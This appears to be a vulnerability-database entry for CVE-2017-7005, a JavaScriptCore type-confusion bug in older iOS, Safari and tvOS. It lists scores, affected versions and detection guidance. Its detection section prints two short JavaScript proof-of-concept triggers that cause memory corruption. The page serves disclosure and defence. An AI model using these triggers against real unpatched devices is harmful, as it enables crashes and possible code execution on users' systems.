cbcvebase.
CVE-2017-7005
published 2018-04-03

CVE-2017-7005: An issue was discovered in certain Apple products. iOS before 10.3.2 is affected. Safari before 10.1.1 is affected. tvOS before 10.2.1 is affected. The issue…

PriorityP263high8.8CVSS 3.0
AVNACLPRNUIRSUCHIHAH
EXPLOIT
EPSS
6.70%
93.1th percentile
An issue was discovered in certain Apple products. iOS before 10.3.2 is affected. Safari before 10.1.1 is affected. tvOS before 10.2.1 is affected. The issue involves the "JavaScriptCore" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.

Affected

6 ranges
VendorProductVersion rangeFixed in
appleios
appleiphone_os< 10.3.210.3.2
applesafari< 10.1.110.1.1
applesafari
appletvos< 10.2.110.2.1
appletvos

Detection & IOCsextracted from sources · hover to see the quote

commandArray.prototype.__defineGetter__(100, () => 1); let f = document.body.appendChild(document.createElement('iframe')); let a = new f.contentWindow.Array(2.3023e-320, 2.3023e-320, 2.3023e-320, 2.3023e-320, 2.3023e-320, 2.3023e-320); let c = Array.prototype.slice.call(a); alert(c);
commandArray.prototype.__defineGetter__(100, () => 1); let f = document.body.appendChild(document.createElement('iframe')); let a = new f.contentWindow.Array(2.3023e-320, 2.3023e-320); let b = new f.contentWindow.Array(2.3023e-320, 2.3023e-320); let c = Array.prototype.concat.call(a, b); alert(c);
  • Detect cross-iframe Array construction combined with Array.prototype.__defineGetter__ on a numeric index (e.g., index 100) — this is the trigger pattern for the JSGlobalObject::haveABadTime type confusion in JavaScriptCore.
  • Look for JavaScript that creates Arrays via a cross-origin iframe's contentWindow.Array constructor populated with the double value 2.3023e-320 (NaN-boxed pointer pattern), then calls Array.prototype.slice.call or Array.prototype.concat.call on the result — this is the concrete PoC exploit pattern for CVE-2017-7005.
  • The vulnerability is triggered when an Array originating from a different JSGlobalObject (cross-iframe) is passed to arrayProtoPrivateFuncConcatMemcpy or arrayProtoFuncSlice, causing resultStructure to resolve to ArrayWithSlowPutArrayStorage instead of the expected ArrayWithDouble, resulting in a type confusion memory corruption.
  • Monitor for crafted web content that triggers unexpected application termination or arbitrary code execution via JavaScriptCore on iOS < 10.3.2, Safari < 10.1.1, and tvOS < 10.2.1.
  • ·Affected products and versions: iOS before 10.3.2, Safari before 10.1.1, tvOS before 10.2.1 — the vulnerability exists only in the JavaScriptCore component on these unpatched versions.
  • ·The type confusion is specifically triggered only when an Array is constructed in a cross-iframe (different JSGlobalObject) context AND Array.prototype.__defineGetter__ has been called on a numeric index, which causes haveABadTime to activate and forces ArrayWithSlowPutArrayStorage indexing type.

CVSS provenance

nvdv3.08.8HIGHCVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
nvdv2.06.8MEDIUMAV:N/AC:M/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.